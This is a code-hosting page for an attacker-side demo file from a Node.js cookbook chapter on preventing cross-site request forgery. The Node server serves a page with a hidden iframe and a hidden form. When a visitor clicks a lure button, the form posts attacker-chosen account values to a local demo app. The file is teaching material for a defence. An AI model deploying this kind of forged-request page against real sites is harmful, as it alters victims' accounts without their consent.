ecki/Node.js-14-Cookbook
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Node.js-14-Cookbook/Chapter08/preventing-cross-site-request-forgery/attacker/index.js
Akhil b9ae409ec0 Code files
2017-07-31 11:33:31 +05:30

19 lines
622 B
JavaScript
Raw Blame History

const http = require('http')
const attackerAc = '87654321'
const attackerSc = '11-11-11'
const attackerMsg = 'Everything you could ever want is only one click away'
const server = http.createServer((req, res) => {
res.writeHead(200, {'Content-Type': 'text/html'})
res.end(`
<iframe name=hide style="position:absolute;left:-1000px"></iframe>
<form method="post" action="http://app.local/update" target=hide>
<input type=hidden name=sc value="${attackerAc}">
<input type=hidden name=ac value="${attackerSc}">
<input type=submit value="${attackerMsg}">
</form>
`)
})
server.listen(3001)
Reference in New Issue View Git Blame Copy Permalink